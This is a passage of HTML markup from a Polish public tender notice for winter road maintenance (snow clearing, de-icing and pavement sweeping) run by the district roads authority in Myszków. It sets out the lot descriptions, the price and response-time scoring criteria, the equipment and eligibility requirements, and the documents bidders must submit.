class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpoczęcia akcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Odśnieżanie ładowarką jednonaczyniową kołową o pojemności łyżki min. 3,5 m3<br/>Szacunkowy zakres do przepracowania w ramach realizacji usług dla CZĘŚCI 3 - 100,00 godz.<br/>Wymagana ilość jednostek sprzętowych dla CZĘŚCI 3 - 1 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oraz ich znaczeniem:<br/><br/>L.p.	<br/>Kryterium	Znaczenie kryterium<br/>(w %)	Liczba możliwych <br/>do uzyskania punktów<br/>1.	Cena łączna brutto realizacji zamówienia	60	60<br/>2.	Czas rozpoczęcia akcji	40	40<br/><br/>Zamawiający dokona oceny ofert przyznając punkty w ramach kryteriów oceny ofert, przyjmując zasadę, że 1 % = 1 punkt.<br/><br/>1.Cena łączna brutto realizacji zamówienia – 60% (C).<br/> <br/>Sposób punktacji przy założeniu, że 1% ze współczynników określonych wyżej odpowiada 1 punktowi, wg wzoru S=C<br/>gdzie:<br/>S – Suma punktów przyznanych ofercie – max.	60 punktów<br/>C – ilość punktów za oferowaną cenę (brutto) – max. 60 punktów<br/>	<br/>Oferta o najniższej cenie uzyska maksymalną ilość punktów 60.<br/>Pozostałym oferentom przyznana zostanie odpowiednio mniejsza ilość punktów wg wzoru:<br/>(Cn/Cb) x 60 = Wc<br/>	<br/>gdzie:<br/>WC – ilość punktów dla kryterium ceny<br/>Cn – najniższa łączna cena brutto realizacji zamówienia<br/>Cb – łączna cena brutto realizacji zamówienia oferty badanej<br/><br/><br/>Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku. <br/><br/><br/>2 Czas rozpoczęcia akcji – 40 % (Cz).<br/><br/>Punkty za kryterium „Czas rozpoczęcia akcji” liczony będzie od złożenia dyspozycji ustnej bądź pisemnej przez upoważnionego przedstawiciela Zamawiającego, za każde 15 minut poniżej 60 min Zamawiający przyzna pkt następująco:<br/>- 60 minut -	0 pkt<br/>- 45 min - 20 pkt<br/>- 30 min -	40 pkt<br/><br/>Czas rozpoczęcia akcji nie może być dłuży niż 60 minut.<br/><br/>W przypadku braku wskazania przez Wykonawcę w Formularzu Ofertowym (załącznik nr 1 do SWZ) czasu rozpoczęcia akcji, zamawiający uzna, że wykonawca zobowiązuje się do realizacji przedmiotu zamówienia w czasie 60 minut i do obliczenia punktacji w niniejszym kryterium przyjmie czas 60 minut.<br/><br/>W przypadku wskazania przez Wykonawcę w Formularzu Ofertowym (załącznik nr 1 do SWZ) czasu rozpoczęcia akcji dłuższego niż 60 minut zostanie odrzucona.<br/><br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która będzie przedstawiała najkorzystniejszy bilans punktów (P) za: <br/>- cena łączna brutto realizacji zamówienia<br/>- czas rozpoczęcia akcji<br/> w oparciu o następujący wzór:<br/>P= C + Cz<br/><br/>Wszystkie obliczenia zostaną dokonane z dokładnością do dwóch miejsc po przecinku.<br/><br/><br/>Jeżeli nie będzie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z niższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w złożonych ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpoczęcia akcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Odśnieżanie i wykonywanie załadunku piasku i mieszanek piaskowo-solnych koparko-ładowarką na podwoziu kołowym o pojemności łyżki min. od 1,0 m3 do max. 2,0 m3 <br/>Szacunkowy zakres do przepracowania w ramach realizacji usług dla CZĘŚCI 4: - 300,00 godz. (praca), - 300,00 godz. (dyżur) <br/>Wymagana ilość jednostek sprzętowych dla CZĘŚCI 4 - 1 szt.<br/>Informacje dodatkowe: <br/>1.	Dyżury operatora i sprzętu Wykonawcy dla części 4 będą obowiązywały w miesiącach grudzień 2021 - luty 2022. W tym okresie Wykonawca otrzyma z tygodniowym wyprzedzeniem harmonogram czasu pracy i będzie zobowiązany do zapewnienia zarówno sprzętu jak i operatora w wyznaczonym czasie. Dyżur jednostki sprzętowej oraz operatora będzie odbywał się na bazie PZD.<br/>2.	UWAGA: Wynagrodzenie za godziny dyżuru zostaną naliczone przez Wykonawcę tylko zgodnie z harmonogramem przekazanym przez PZD. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oraz ich znaczeniem:<br/><br/>L.p.	<br/>Kryterium	Znaczenie kryterium<br/>(w %)	Liczba możliwych <br/>do uzyskania punktów<br/>1.	Cena łączna brutto realizacji zamówienia	60	60<br/>2.	Czas rozpoczęcia akcji	40	40<br/><br/>Zamawiający dokona oceny ofert przyznając punkty w ramach kryteriów oceny ofert, przyjmując zasadę, że 1 % = 1 punkt.<br/><br/>1.Cena łączna brutto realizacji zamówienia – 60% (C).<br/> <br/>Sposób punktacji przy założeniu, że 1% ze współczynników określonych wyżej odpowiada 1 punktowi, wg wzoru S=C<br/>gdzie:<br/>S – Suma punktów przyznanych ofercie – max.	60 punktów<br/>C – ilość punktów za oferowaną cenę (brutto) – max. 60 punktów<br/>	<br/>Oferta o najniższej cenie uzyska maksymalną ilość punktów 60.<br/>Pozostałym oferentom przyznana zostanie odpowiednio mniejsza ilość punktów wg wzoru:<br/>(Cn/Cb) x 60 = Wc<br/>	<br/>gdzie:<br/>WC – ilość punktów dla kryterium ceny<br/>Cn – najniższa łączna cena brutto realizacji zamówienia<br/>Cb – łączna cena brutto realizacji zamówienia oferty badanej<br/><br/><br/>Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku. <br/><br/><br/>2 Czas rozpoczęcia akcji – 40 % (Cz).<br/><br/>Punkty za kryterium „Czas rozpoczęcia akcji” liczony będzie od złożenia dyspozycji ustnej bądź pisemnej przez upoważnionego przedstawiciela Zamawiającego, za każde 15 minut poniżej 60 min Zamawiający przyzna pkt następująco:<br/>- 60 minut -	0 pkt<br/>- 45 min - 20 pkt<br/>- 30 min -	40 pkt<br/><br/>Czas rozpoczęcia akcji nie może być dłuży niż 60 minut.<br/><br/>W przypadku braku wskazania przez Wykonawcę w Formularzu Ofertowym (załącznik nr 1 do SWZ) czasu rozpoczęcia akcji, zamawiający uzna, że wykonawca zobowiązuje się do realizacji przedmiotu zamówienia w czasie 60 minut i do obliczenia punktacji w niniejszym kryterium przyjmie czas 60 minut.<br/><br/>W przypadku wskazania przez Wykonawcę w Formularzu Ofertowym (załącznik nr 1 do SWZ) czasu rozpoczęcia akcji dłuższego niż 60 minut zostanie odrzucona.<br/><br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która będzie przedstawiała najkorzystniejszy bilans punktów (P) za: <br/>- cena łączna brutto realizacji zamówienia<br/>- czas rozpoczęcia akcji<br/> w oparciu o następujący wzór:<br/>P= C + Cz<br/><br/>Wszystkie obliczenia zostaną dokonane z dokładnością do dwóch miejsc po przecinku.<br/><br/><br/>Jeżeli nie będzie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z niższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w złożonych ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpoczęcia akcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Likwidacja gołoledzi oraz mechaniczne i ręczne odśnieżanie nawierzchni chodników i ścieżek pieszo-rowerowych zlokalizowanych w ciągu dróg wojewódzkich utrzymywanych przez Powiatowy Zarząd Dróg w Myszkowie.<br/>Mechaniczne odśnieżanie i likwidacja gołoledzi na nawierzchni chodników i ścieżek pieszo-rowerowych należy wykonać za pomocą opłużonego pojazdu mechanicznego bądź ciągnika rolniczego, konstrukcyjnie dostosowanego do montażu pługa oraz rozrzutnika piachu o dopuszczalnej masie całkowitej wraz z osprzętem i ładunkiem nieprzekraczającej 3,5 tony. <br/>2) Pozimowe zamiatanie nawierzchni chodników i ścieżek pieszo-rowerowych objętych zimowym utrzymaniem <br/>Szacunkowy zakres do przepracowania w ramach realizacji usług dla CZĘŚCI 5:<br/>- 20 akcji x 53 010,0 mb (zimowe utrzymanie); <br/>- 1 akcja x 53 010,0 mb (pozimowe zamiatanie) <br/>Wymagana ilość jednostek sprzętowych dla CZĘŚCI 5 - min. po 2 szt. dla pkt 1) i min. po 2 szt. dla pkt 2)<br/>Uwaga: Wykaz chodników i ścieżek stanowiący załącznik nr 10 do SWZ zawiera inną łączną długość chodników i ścieżek pieszo-rowerowych objętych zimowym utrzymaniem. TRASA Nr 3 - GMINA POCZESNA, GMINA PORAJ, POSTĘP (DW Nr 791) zostanie włączona do zimowego utrzymania tylko z chwilą oddania remontowanego odcinka do utrzymania przez PZD. Wykonawca zobowiązany będzie do utrzymania tylko zleconych przez Zamawiającego odcinków. Wykonawca nie może domagać się zwiększenia ilości zlecanych metrów do utrzymania. Zamawiający zastrzega sobie prawo zwiększenia lub zmniejszenia ilości metrów zlecanych do zimowego utrzymania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90612000-0 - Usługi zamiatania ulic</p> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oraz ich znaczeniem:<br/><br/>L.p.	<br/>Kryterium	Znaczenie kryterium<br/>(w %)	Liczba możliwych <br/>do uzyskania punktów<br/>1.	Cena łączna brutto realizacji zamówienia	60	60<br/>2.	Czas rozpoczęcia akcji	40	40<br/><br/>Zamawiający dokona oceny ofert przyznając punkty w ramach kryteriów oceny ofert, przyjmując zasadę, że 1 % = 1 punkt.<br/><br/>1.Cena łączna brutto realizacji zamówienia – 60% (C).<br/> <br/>Sposób punktacji przy założeniu, że 1% ze współczynników określonych wyżej odpowiada 1 punktowi, wg wzoru S=C<br/>gdzie:<br/>S – Suma punktów przyznanych ofercie – max.	60 punktów<br/>C – ilość punktów za oferowaną cenę (brutto) – max. 60 punktów<br/>	<br/>Oferta o najniższej cenie uzyska maksymalną ilość punktów 60.<br/>Pozostałym oferentom przyznana zostanie odpowiednio mniejsza ilość punktów wg wzoru:<br/>(Cn/Cb) x 60 = Wc<br/>	<br/>gdzie:<br/>WC – ilość punktów dla kryterium ceny<br/>Cn – najniższa łączna cena brutto realizacji zamówienia<br/>Cb – łączna cena brutto realizacji zamówienia oferty badanej<br/><br/><br/>Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku. <br/><br/><br/>2 Czas rozpoczęcia akcji – 40 % (Cz).<br/><br/>Punkty za kryterium „Czas rozpoczęcia akcji” liczony będzie od złożenia dyspozycji ustnej bądź pisemnej przez upoważnionego przedstawiciela Zamawiającego, za każde 15 minut poniżej 60 min Zamawiający przyzna pkt następująco:<br/>- 60 minut -	0 pkt<br/>- 45 min - 20 pkt<br/>- 30 min -	40 pkt<br/><br/>Czas rozpoczęcia akcji nie może być dłuży niż 60 minut.<br/><br/>W przypadku braku wskazania przez Wykonawcę w Formularzu Ofertowym (załącznik nr 1 do SWZ) czasu rozpoczęcia akcji, zamawiający uzna, że wykonawca zobowiązuje się do realizacji przedmiotu zamówienia w czasie 60 minut i do obliczenia punktacji w niniejszym kryterium przyjmie czas 60 minut.<br/><br/>W przypadku wskazania przez Wykonawcę w Formularzu Ofertowym (załącznik nr 1 do SWZ) czasu rozpoczęcia akcji dłuższego niż 60 minut zostanie odrzucona.<br/><br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która będzie przedstawiała najkorzystniejszy bilans punktów (P) za: <br/>- cena łączna brutto realizacji zamówienia<br/>- czas rozpoczęcia akcji<br/> w oparciu o następujący wzór:<br/>P= C + Cz<br/><br/>Wszystkie obliczenia zostaną dokonane z dokładnością do dwóch miejsc po przecinku.<br/><br/><br/>Jeżeli nie będzie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z niższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w złożonych ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpoczęcia akcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.	nie podlegają wykluczeniu,<br/>2.	spełniają warunki udziału w postępowaniu, o ile zostały one określone<br/>1.2.	Na podstawie art. 112 ustawy Pzp, Zamawiający określa warunki udziału w postępowaniu dotyczące:<br/><br/>1.	zdolności do występowania w obrocie gospodarczym - Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie;<br/><br/>2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów - Wykonawca spełni warunek udziału w postępowaniu, jeżeli Wykonawca wykaże się licencją na wykonywanie transportu drogowego, o której mowa w art. 5 ust. 1 ustawy z dnia 6 września 2001 r. o transporcie drogowym (tekst jednolity Dz. U. z 2021 r., poz. 919) - dotyczy Części 1 przedmiotu zamówienia. <br/><br/>3.	sytuacji ekonomicznej lub finansowej - Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie;<br/><br/>4.	zdolności technicznej lub zawodowej – W celu oceny spełnienia warunku w zakresie potencjału technicznego, Zamawiający uzna, iż Wykonawca spełni warunek, jeżeli wykaże, że dysponuje lub będzie dysponował odpowiednimi narzędziami, wyposażeniem zakładu i urządzeniami technicznymi dostępnymi Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami. Wykonawca musi dysponować jednostkami sprzętu wymienionymi poniżej lub przedstawi pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji potencjału technicznego w zakresie tu określonym na potrzeby realizacji zamówienia:<br/><br/>Lp. Wyszczególnienie jednostek sprzętowych<br/>(Parametry)	Minimalna wymagana liczba jednostek<br/>1.	Samochód ciężarowy o napędzie min. na dwie osie (dopuszcza się napęd 6x4) min.190 KM, wyposażony w zamontowaną piaskarko-solarkę i pług odśnieżny "średni" <br/> dopuszcza się zastosowanie i wykazanie jednostek sprzętowych określonych poniżej, a suma wymaganych jednostek sprzętowych ma być równa 7 szt. <br/>- Samochód ciężarowy o napędzie min. na dwie osie (dopuszcza się napęd 6x4) min.190 KM, wyposażony w zamontowaną piaskarko-solarkę i pług odśnieżny "średni"<br/>- Samochód ciężarowy o napędzie min. na dwie osie (dopuszcza się napęd 6x4), wyposażony w piaskarkę (P-1) i pług odśnieżny "średni"<br/>- dot. przedmiotu zamówienia dla CZĘŚCI 1 <br/>min. 7 szt.<br/><br/> min. 5 szt.<br/><br/>min. 2 szt. <br/>2.	Równiarka samojezdna min. 120 KM wyposażona w lemiesz o zmiennej geometrii - dot. przedmiotu zamówienia dla CZĘŚCI 2	min. 1 szt.<br/>3.	Ładowarka jednonaczyniowa kołową o pojemności łyżki min. 3,5 m3 - dot. przedmiotu zamówienia dla CZĘŚCI 3	<br/>min. 1 szt.<br/>4.	Koparko-ładowarka na podwoziu kołowym o pojemności łyżki min. od 1,0 m3 do max. 2,0 m3 - dot. przedmiotu zamówienia dla CZĘŚCI 4	min. 1 szt.<br/>5.	Opłużony pojazd mechaniczny, bądź ciągnik rolniczy, konstrukcyjnie dostosowany do montażu pługa oraz rozrzutnika piachu o dopuszczalnej masie całkowitej wraz z osprzętem i ładunkiem nieprzekraczającej 3,5 tony - dot. przedmiotu zamówienia dla CZĘŚCI 5	<br/>min. 2 szt. <br/>6.	Zamiatarka mechaniczna samojezdna bądź doczepna o dopuszczalnej masie całkowitej do 3,5 t - dot. przedmiotu zamówienia dla CZĘŚCI 5	min. 2 szt. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru potwierdzającego, że osoba działająca w<br/>imieniu wykonawcy jest umocowana do jego reprezentowania2) Oświadczenie o którym mowa w art.<br/>125</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.1.	Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/><br/>- dokument potwierdzający posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania (Część 1)<br/><br/> - wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami – w zakresie odpowiedniej części (Wzór wykazu stanowi załącznik Nr 4 do SWZ).ust. 1 ustawy Pzp</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie stawia wymogu złożenia wraz z ofertą przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.4.	Do oferty Wykonawca zobowiązany jest załączyć:<br/>1)	formularz ofertowy stanowiący załącznik nr 1,<br/>2)	formularz cenowy stanowiący załączniki nr 1.1. – 1.5 ( w zależności na jaką część zadania Wykonawca składa swoją ofertę,<br/>3)	oświadczenie stanowiące dowód potwierdzenia braku podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu – załącznik nr 2,<br/>4)	odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru potwierdzającego, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania,<br/>5)	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, gdy umocowanie osoby składającej ofertę nie wynika z innych dokumentów,<br/>6)	zobowiązanie, o którym mowa w rozdziale I, sekcja 5 ust. 5.3 oraz 5.4 SWZ w przypadku polegania na zasobach podmiotu udostepniającego zasób Wykonawcy,<br/>7)	w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a)	pełnomocnictwo, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, z treści którego będzie wynikało umocowanie do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postepowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno zawierać w szczególności wskazanie:<br/>-	postępowania o zamówienie publicznego, którego dotyczy,<br/>-	wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>-	ustanowionego pełnomocnika oraz zakresu jego pełnomocnictwa,<br/>1.5.	oświadczenie, o którym mowa w rozdziale I sekcja 4 ust. 4.4 SWZ <br/>1.6.	Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w ust. 1.4 pkt. 1), jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>1.7.	Zapisy ust. 1.4 pkt 2) stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>1.8.	Zapisy ust. 1.4 pkt 1) i pkt 2), ust. 1.5 stosuje się odpowiednio do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp lub podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 4.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>4.2.	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (o ile został sformułowany), o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>4.3.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia (o ile zostały sformułowane) wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>4.4.	W przypadku, o którym mowa w ust. 4.2 i 4.3, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany i uzupełnienia treści umowy pod rygorem nieważności mogą być dokonywane wyłącznie w formie pisemnego aneksu podpisanego przez obie Strony.<br/>2. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem art. 455 Pzp. <h3 class="mb-0">7.5.) 